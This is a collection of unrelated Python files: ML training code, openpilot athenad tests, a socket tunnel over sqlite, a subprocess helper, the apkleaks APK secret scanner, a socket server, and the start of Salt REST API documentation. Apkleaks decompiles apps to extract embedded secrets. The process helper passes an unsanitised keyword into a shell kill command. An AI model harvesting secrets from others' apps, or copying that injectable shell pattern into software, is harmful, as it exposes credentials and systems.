if save_errors:
errors.extend([train_loss, l2_loss])
if validate:
val_loss /= val_batches
val_err /= val_batches
print(" validation loss:\t%.6f" % val_loss)
print(" validation error:\t%.2f%%" % (val_err * 100))
if save_errors:
errors.extend([val_loss, val_err])
test_loss = 0
test_err = 0
test_batches = len(X_test) // batchsize
for inputs, targets in cifar10.iterate_minibatches(X_test, y_test,
batchsize,
shuffle=False):
loss, err = test_fn(inputs, targets)
test_loss += loss
test_err += err
print(" test loss:\t\t%.6f" % (test_loss / test_batches))
print(" test error:\t\t%.2f%%" % (test_err / test_batches * 100))
# After training, we compute and print the test error:
test_loss = 0
test_err = 0
test_batches = len(X_test) // batchsize
for inputs, targets in cifar10.iterate_minibatches(X_test, y_test,
batchsize,
shuffle=False):
loss, err = test_fn(inputs, targets)
test_loss += loss
test_err += err
print("Final results:")
print(" test loss:\t\t%.6f" % (test_loss / test_batches))
print(" test error:\t\t%.2f%%" % (test_err / test_batches * 100))
# Optionally, we dump the network weights to a file
if save_weights:
np.savez(save_weights, *lasagne.layers.get_all_param_values(network))
# Optionally, we dump the learning curves to a file
if save_errors:
errors = np.asarray(errors).reshape(epochs, -1)
np.savez(save_errors, errors=errors)
def main():
# parse command line
parser = opts_parser()
args = parser.parse_args()
# run
train_test(**vars(args))
if __name__ == "__main__":
main()
|
test.py
|
#!/usr/bin/env python3
import json
import os
import requests
import tempfile
import time
import threading
import queue
import unittest
from multiprocessing import Process
from pathlib import Path
from unittest import mock
from websocket import ABNF
from websocket._exceptions import WebSocketConnectionClosedException
from selfdrive.athena import athenad
from selfdrive.athena.athenad import dispatcher
from selfdrive.athena.test_helpers import MockWebsocket, MockParams, MockApi, EchoSocket, with_http_server
from cereal import messaging
class TestAthenadMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.SOCKET_PORT = 45454
athenad.ROOT = tempfile.mkdtemp()
athenad.Params = MockParams
athenad.Api = MockApi
athenad.LOCAL_PORT_WHITELIST = set([cls.SOCKET_PORT])
def test_echo(self):
assert dispatcher["echo"]("bob") == "bob"
def test_getMessage(self):
with self.assertRaises(TimeoutError) as _:
dispatcher["getMessage"]("controlsState")
def send_thermal():
messaging.context = messaging.Context()
pub_sock = messaging.pub_sock("thermal")
start = time.time()
while time.time() - start < 1:
msg = messaging.new_message()
msg.init('thermal')
pub_sock.send(msg.to_bytes())
time.sleep(0.01)
p = Process(target=send_thermal)
p.start()
time.sleep(0.1)
try:
thermal = dispatcher["getMessage"]("thermal")
assert thermal['thermal']
finally:
p.terminate()
def test_listDataDirectory(self):
print(dispatcher["listDataDirectory"]())
@with_http_server
def test_do_upload(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
try:
item = athenad.UploadItem(path=fn, url="http://localhost:1238", headers={}, created_at=int(time.time()*1000), id='')
try:
athenad._do_upload(item)
except requests.exceptions.ConnectionError:
pass
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
resp = athenad._do_upload(item)
self.assertEqual(resp.status_code, 201)
finally:
os.unlink(fn)
@with_http_server
def test_uploadFileToUrl(self, host):
not_exists_resp = dispatcher["uploadFileToUrl"]("does_not_exist.bz2", "http://localhost:1238", {})
self.assertEqual(not_exists_resp, 404)
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
try:
resp = dispatcher["uploadFileToUrl"]("qlog.bz2", f"{host}/qlog.bz2", {})
self.assertEqual(resp['enqueued'], 1)
self.assertDictContainsSubset({"path": fn, "url": f"{host}/qlog.bz2", "headers": {}}, resp['item'])
self.assertIsNotNone(resp['item'].get('id'))
self.assertEqual(athenad.upload_queue.qsize(), 1)
finally:
athenad.upload_queue = queue.Queue()
os.unlink(fn)
@with_http_server
def test_upload_handler(self, host):
fn = os.path.join(athenad.ROOT, 'qlog.bz2')
Path(fn).touch()
item = athenad.UploadItem(path=fn, url=f"{host}/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='')
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
athenad.upload_queue.put_nowait(item)
try:
now = time.time()
while time.time() - now < 5:
if athenad.upload_queue.qsize() == 0:
break
self.assertEqual(athenad.upload_queue.qsize(), 0)
finally:
end_event.set()
athenad.upload_queue = queue.Queue()
os.unlink(fn)
def test_cancelUpload(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
dispatcher["cancelUpload"](item.id)
self.assertIn(item.id, athenad.cancelled_uploads)
end_event = threading.Event()
thread = threading.Thread(target=athenad.upload_handler, args=(end_event,))
thread.start()
try:
now = time.time()
while time.time() - now < 5:
if athenad.upload_queue.qsize() == 0 and len(athenad.cancelled_uploads) == 0:
break
self.assertEqual(athenad.upload_queue.qsize(), 0)
self.assertEqual(len(athenad.cancelled_uploads), 0)
finally:
end_event.set()
athenad.upload_queue = queue.Queue()
def test_listUploadQueue(self):
item = athenad.UploadItem(path="qlog.bz2", url="http://localhost:44444/qlog.bz2", headers={}, created_at=int(time.time()*1000), id='id')
athenad.upload_queue.put_nowait(item)
try:
items = dispatcher["listUploadQueue"]()
self.assertEqual(len(items), 1)
self.assertDictEqual(items[0], item._asdict())
finally:
athenad.upload_queue = queue.Queue()
@mock.patch('selfdrive.athena.athenad.create_connection')
def test_startLocalProxy(self, mock_create_connection):
end_event = threading.Event()
ws_recv = queue.Queue()
ws_send = queue.Queue()
mock_ws = MockWebsocket(ws_recv, ws_send)
mock_create_connection.return_value = mock_ws
echo_socket = EchoSocket(self.SOCKET_PORT)
socket_thread = threading.Thread(target=echo_socket.run)
socket_thread.start()
athenad.startLocalProxy(end_event, 'ws://localhost:1234', self.SOCKET_PORT)
ws_recv.put_nowait(b'ping')
try:
recv = ws_send.get(timeout=5)
assert recv == (b'ping', ABNF.OPCODE_BINARY), recv
finally:
# signal websocket close to athenad.ws_proxy_recv
ws_recv.put_nowait(WebSocketConnectionClosedException())
socket_thread.join()
def test_getSshAuthorizedKeys(self):
keys = dispatcher["getSshAuthorizedKeys"]()
self.assertEqual(keys, MockParams().params["GithubSshKeys"].decode('utf-8'))
def test_jsonrpc_handler(self):
end_event = threading.Event()
thread = threading.Thread(target=athenad.jsonrpc_handler, args=(end_event,))
thread.daemon = True
thread.start()
athenad.payload_queue.put_nowait(json.dumps({"method": "echo", "params": ["hello"], "jsonrpc": "2.0", "id": 0}))
try:
resp = athenad.response_queue.get(timeout=3)
self.assertDictEqual(resp.data, {'result': 'hello', 'id': 0, 'jsonrpc': '2.0'})
finally:
end_event.set()
thread.join()
if __name__ == '__main__':
unittest.main()
|
clientside.py
|
#!/usr/bin/env python3
import socket
import sqlite3
import threading
import time
import traceback
from datetime import datetime
from constants import *
lock = threading.Lock()
min_noninserted_conn_id = SEQ_MIN_VALUE
next_conn_id = SEQ_MIN_VALUE
data_from_db = {} # : dict[int, tuple[bool, bytes]]
data_to_db = {} # : dict[int, tuple[bool, bytes]]
next_chunk_ids = {} # : dict[int, int]
dead_serverside_conn_ids = set() # : set[int]
def sync_with_db():
print(f"{datetime.now().isoformat()} db synchronizing. to: {list(data_to_db.keys())}")
global data_from_db, min_noninserted_conn_id, next_chunk_ids, dead_serverside_conn_ids
with lock:
with sqlite3.connect(DBNAME, DB_TIMEOUT) as con:
try:
# con.set_trace_callback(print)
cur = con.cursor()
new_data_from_db = data_from_db.copy()
new_next_chunk_ids = next_chunk_ids.copy()
keys_of_data = []
# data from db
for (conn_id, chunk_id, chunk_data) in cur.execute("""\
SELECT conn_id, chunk_id, chunk_data
FROM data
WHERE direction = ?
ORDER BY conn_id, chunk_id
""", (DIRECTION_TO_CLIENT,)):
down, data = new_data_from_db.get(conn_id, (False, b""))
down = down or not chunk_data
data = data + chunk_data
if conn_id in next_chunk_ids:
new_data_from_db[conn_id] = down, data
keys_of_data.append((conn_id, DIRECTION_TO_CLIENT, chunk_id))
cur.executemany("DELETE FROM data WHERE conn_id = ? AND direction = ? AND chunk_id = ?", keys_of_data)
# data to db
for (conn_id, (down, data)) in data_to_db.items():
next_chunk_id = new_next_chunk_ids.get(conn_id, SEQ_MIN_VALUE)
params = [(conn_id, DIRECTION_TO_SERVER, next_chunk_id, data)]
if down and data:
params.append((conn_id, DIRECTION_TO_SERVER, next_chunk_id + 1, b""))
cur.executemany("INSERT INTO data VALUES (?, ?, ?, ?)", params)
new_next_chunk_ids[conn_id] = next_chunk_id + len(params)
# conn_ids
db_dead_serverside_conn_ids = \
set(map(lambda t: t[0], cur.execute("SELECT conn_id FROM dead_serverside_conn_ids")))
new_dead_serverside_conn_ids = \
next_chunk_ids.keys() & \
(dead_serverside_conn_ids | (db_dead_serverside_conn_ids - dead_serverside_conn_ids))
if new_dead_serverside_conn_ids != db_dead_serverside_conn_ids:
cur.execute("DELETE FROM dead_serverside_conn_ids")
cur.executemany(
"INSERT INTO dead_serverside_conn_ids VALUES (?)",
map(lambda i: (i,), new_dead_serverside_conn_ids)
)
db_clientside_conn_ids = \
set(map(lambda t: t[0], cur.execute("SELECT conn_id FROM clientside_conn_ids")))
if next_chunk_ids.keys() != db_clientside_conn_ids:
cur.execute("DELETE FROM clientside_conn_ids")
cur.executemany(
"INSERT INTO clientside_conn_ids VALUES (?)",
map(lambda i: (i,), next_chunk_ids.keys())
)
# commit
con.commit()
# update cache
min_noninserted_conn_id = next_conn_id
data_from_db = new_data_from_db
data_to_db.clear()
next_chunk_ids = new_next_chunk_ids
dead_serverside_conn_ids = new_dead_serverside_conn_ids
except Exception as e: # sqlite3.Error:
print(f"Rolling back. {e}")
print(traceback.format_exc())
con.rollback()
print(
f"{datetime.now().isoformat()} "
f"db synchronized. "
f"from: {list(data_from_db.keys())}, "
f"conns: {next_chunk_ids}, "
f"dead_svr_conns: {list(dead_serverside_conn_ids)}"
)
def handle_db():
while True:
sync_with_db()
time.sleep(DB_SLEEP_TIME)
def get_conn_id():
global next_conn_id
with lock:
conn_id = next_conn_id
next_chunk_ids[conn_id] = SEQ_MIN_VALUE
next_conn_id = next_conn_id + 1
return conn_id
def handle_client_socket(client_socket: socket.socket):
try:
with client_socket as s:
s.settimeout(SLEEP_TIME)
conn_id = get_conn_id()
print(f"{datetime.now().isoformat()} connection {conn_id} started")
sending = True
send_data_remains = False
receiving = True
while sending or receiving:
if sending: # to the client
# print(f"connection {conn_id} writing")
with lock:
data_from_db_pair = data_from_db.get(conn_id)
if data_from_db_pair:
del data_from_db[conn_id]
if data_from_db_pair:
down, data = data_from_db_pair
if data:
sent = s.send(data[:BUFSIZE])
send_data_remains = sent != len(data)
if send_data_remains:
with lock:
new_data_from_db_pair = data_from_db.get(conn_id)
if new_data_from_db_pair:
data_from_db[conn_id] = \
new_data_from_db_pair[0], new_data_from_db_pair[1][sent:]
else:
data_from_db[conn_id] = down, data[sent:]
if down and not send_data_remains:
s.shutdown(socket.SHUT_WR)
sending = False
print(f"{datetime.now().isoformat()} connection {conn_id} write shutdown")
if receiving: # from the client
# print(f"connection {conn_id} reading")
try:
chunk = s.recv(BUFSIZE)
except socket.timeout: # BlockingIOError:
pass
else:
with lock:
down, data = data_to_db.get(conn_id, (False, b""))
data_to_db[conn_id] = down or not chunk, data + chunk
if not chunk:
receiving = False
print(f"{datetime.now().isoformat()} connection {conn_id} read shutdown")
with lock:
alive = conn_id not in dead_serverside_conn_ids
# print(f"connection {conn_id} is alive: {alive}")
if not send_data_remains and not alive:
print(f"{datetime.now().isoformat()} connection {conn_id} is dead on the server side")
break
if not receiving:
time.sleep(SLEEP_TIME)
finally:
with lock:
if conn_id in next_chunk_ids:
del next_chunk_ids[conn_id]
if conn_id in data_from_db:
del data_from_db[conn_id]
if conn_id in data_to_db:
del data_to_db[conn_id]
print(f"{datetime.now().isoformat()} connection {conn_id} closed: {next_chunk_ids}")
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(LISTENING_ADDRESS)
server_socket.listen()
threading.Thread(target=handle_db).start()
while True:
(client_socket, address) = server_socket.accept()
threading.Thread(target=handle_client_socket, args=(client_socket,)).start()
|
process.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module is used to execute the shell script.
"""
import os
import subprocess
import threading
class Process(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
def process_cmd(self):
try:
self.process = subprocess.Popen("exec " + self.cmd, bufsize=0, shell=True, stdout=subprocess.PIPE)
return self.process
except Exception:
return None
def process_cmd_asyc_end(self, key_word):
self.stop_thread.set()
kill_cmd = "ps -ef | grep '" + key_word + "' | grep -v grep | awk '{print $2}' | xargs kill"
print(kill_cmd)
os.popen(kill_cmd)
def process_cmd_asyc(self):
self.stop_thread = threading.Event()
self.process = subprocess.Popen(self.cmd,
bufsize=0,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True)
print(self.process.pid)
proc_thread = threading.Thread(target=self.read, args=(self.process,))
proc_thread.start()
def read(self, process):
while not self.stop_thread.is_set():
output = process.stdout.readline().decode("UTF-8")
# TODO: should add the logic to record the log info here. This will be addressed by issue ID #33
print(output.strip())
if output == "" and self.process.poll() is not None:
break
def get_process(self):
return self.process
def get_process_result(self):
self.process_cmd()
return self.process.communicate()[0].decode("UTF-8")
def get_process_list(self):
self.process_cmd()
res = self.process.communicate()[0].decode("UTF-8")
return res if res is not None else ""
def get_process_content(self):
self.process_cmd()
return self.process.check_out()
@staticmethod
def execute_command(cmd):
process = subprocess.Popen("exec " + cmd, bufsize=0, shell=True, stdout=subprocess.PIPE)
process.communicate()
|
apkleaks.py
|
#!/usr/bin/env python3
from apkleaks.colors import clr
from contextlib import closing
from distutils.spawn import find_executable
from pyaxmlparser import APK
from urllib.request import urlopen
from zipfile import ZipFile
import io
import json
import logging.config
import mimetypes
import numpy
import os
import re
import shutil
import sys
import tempfile
import threading
class APKLeaks:
def __init__(self, args):
self.file = args.file
self.prefix = "apkleaks-"
self.tempdir = tempfile.mkdtemp(prefix=self.prefix)
self.main_dir = os.path.dirname(os.path.realpath(__file__))
self.output = tempfile.mkstemp(suffix=".txt", prefix=self.prefix)[1] if args.output is None else args.output
self.pattern = self.main_dir + "/../config/regexes.json" if args.pattern is None else args.pattern
self.jadx = find_executable("jadx") if find_executable("jadx") is not None else self.main_dir + "/../jadx/bin/jadx%s" % (".bat" if os.name == "nt" else "")
logging.config.dictConfig({"version": 1, "disable_existing_loggers": True})
def apk_info(self):
return APK(self.file)
def dependencies(self):
exter = "https://github.com/skylot/jadx/releases/download/v1.2.0/jadx-1.2.0.zip"
with closing(urlopen(exter)) as jadx:
with ZipFile(io.BytesIO(jadx.read())) as zfile:
zfile.extractall(self.main_dir + "/../jadx")
os.chmod(self.jadx, 33268)
def write(self, message, color):
sys.stdout.write("%s%s%s" % (color, message, clr.ENDC))
def writeln(self, message, color):
self.write(message + "\n", color)
def integrity(self):
if os.path.exists(self.jadx) is False:
self.writeln("Can't find jadx binary.", clr.WARNING)
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
while True:
self.write("Do you want to download jadx? (Y/n) ", clr.OKBLUE)
choice = input().lower()
if choice == "":
choice = valid["y"]
break
elif choice in valid:
choice = valid[choice]
break
else:
self.writeln("\nPlease respond with 'yes' or 'no' (or 'y' or 'n').", clr.WARNING)
if choice:
self.writeln("** Downloading jadx...\n", clr.OKBLUE)
self.dependencies()
else:
sys.exit(self.writeln("Aborted.", clr.FAIL))
if os.path.isfile(self.file) is True:
try:
self.apk = self.apk_info()
except Exception as e:
sys.exit(self.writeln(str(e), clr.WARNING))
else:
return self.apk
else:
sys.exit(self.writeln("It's not a valid file!", clr.WARNING))
def decompile(self):
self.writeln("** Decompiling APK...", clr.OKBLUE)
with ZipFile(self.file) as zipped:
try:
dex = self.tempdir + "/" + self.apk.package + ".dex"
with open(dex, "wb") as classes:
classes.write(zipped.read("classes.dex"))
except Exception as e:
sys.exit(self.writeln(str(e), clr.WARNING))
dec = "%s %s -d %s --deobf" % (self.jadx, dex, self.tempdir)
os.system(dec)
return self.tempdir
def unique(self, list):
x = numpy.array(list)
return (numpy.unique(x))
def finder(self, pattern, path):
matcher = re.compile(pattern)
found = []
for path, _, files in os.walk(path):
for fn in files:
filepath = os.path.join(path, fn)
if mimetypes.guess_type(filepath)[0] is None:
continue
with open(filepath) as handle:
for lineno, line in enumerate(handle):
mo = matcher.search(line)
if mo:
found.append(mo.group())
return self.unique(found)
def extract(self, name, matches):
output = open(self.output, "a+")
if matches:
stdout = ("[%s]" % (name))
self.writeln("\n" + stdout, clr.OKGREEN)
output.write(stdout + "\n")
for secret in matches:
if name == "LinkFinder" and re.match(r"^.(L[a-z]|application|audio|fonts|image|layout|multipart|plain|text|video).*\/.+", secret) is not None:
continue
stdout = ("- %s" % (secret))
print(stdout)
output.write(stdout + "\n")
output.write("\n")
output.close()
def scanning(self):
self.writeln("\n** Scanning against '%s'" % (self.apk.package), clr.OKBLUE)
with open(self.pattern) as regexes:
regex = json.load(regexes)
for name, pattern in regex.items():
if isinstance(pattern, list):
for pattern in pattern:
thread = threading.Thread(target = self.extract, args = (name, self.finder(pattern, self.tempdir)))
thread.start()
else:
thread = threading.Thread(target = self.extract, args = (name, self.finder(pattern, self.tempdir)))
thread.start()
def __del__(self):
print("%s\n** Results saved into '%s%s%s%s'%s" % (clr.OKBLUE, clr.ENDC, clr.OKGREEN, self.output, clr.OKBLUE, clr.ENDC))
try:
shutil.rmtree(self.tempdir)
except Exception:
return
|
Server.py
|
import numpy as np
import errno
from threading import Thread, Lock
import time
from contextlib import contextmanager
import os
import json
from utils_ import *
import socket
def server(data_dict, ADDR):
"""
Listen and connect with clients.
:param data_dict: store data and exit flag
:param ADDR: the address (ip, port) of the server
:return:
"""
print('Server Run task %s (%s)...' % (ADDR, os.getpid()))
listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_socket.bind(ADDR)
listen_socket.listen(5) # REQUEST_QUEUE_SIZE = 3
# signal.signal(signal.SIGCHLD, grim_reaper)
while True:
try:
# print("Server of %s listening" % name)
client_connection, client_address = listen_socket.accept()
t = Thread(target=receive_data, args=(client_connection, data_dict))
t.start()
except IOError as e:
print("Server error !! %s" % e)
code, msg = e.args
# restart 'accept' if it was interrupted
if code == errno.EINTR:
continue
else:
raise
def receive_data(a_socket, data_dict):
"""
receive data from the connected client, save data to the data_dict.
:param a_socket: the socket to listen
:param data_dict: the dict to save raw data reveived and set the exit flag.
:return:
"""
buffer = b''
while True:
data = a_socket.recv(2048)
try:
if not data:
time.sleep(0.001)
continue
while b"$" not in data:
buffer += data
try:
data = a_socket.recv(2048)
except Exception as e:
print("data receive excetption: %s" % e)
except Exception as e:
print("receiver_wrong %s" % e)
print("data is : %d" % len(buffer))
try:
tail = data.split(b'$')
buffer += tail[0] # Add tail of a json to the buffer to form a compact json.
if buffer[-8:] == b'$':
buffer = buffer[:-8]
jsons = [buffer] # List of jsons, each is a compact data package in json format.
if len(tail) > 2:
jsons += tail[1:-1]
except Exception as e:
print("Excetption:", e)
# Append broken tail into the data buffer for further data receiving, whether it is empty or not
if len(tail) >= 2:
buffer = tail[-1]
else:
buffer = b''
try:
bytes_len = sum([len(x) for x in jsons])
jsons = [x.decode("utf-8") for x in jsons]
except Exception as e:
print("Data decode error: %s" % e)
return
# Iterate each data package (json)
for data in jsons:
if data == 'EXIT': # Judge exit flag here
data_dict.exit_flag = True
a_socket.close()
return
try:
received_data = json.loads(data)
except Exception as e:
print("received data '%s' can not be loaded as json. \n Error: %s" % (data, e))
received_data = {}
try:
stamp = received_data.pop('stamp')
# List to numpy array
for key in received_data.keys():
if type(received_data[key]) is list:
received_data[key] = np.asarray(received_data[key])
# Update client data with thread lock.
if data_dict.lock.acquire():
try:
data_dict.byte_len += bytes_len
data_dict.data.update(received_data)
data_dict.received_sender.add(stamp[2]) # mark sender.
finally:
data_dict.lock.release()
else:
print("Filed to get lock!!!")
# print(bytes_len)
except Exception as e:
print("Exception of stamp %s" % e)
|
app.py
|
"""
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
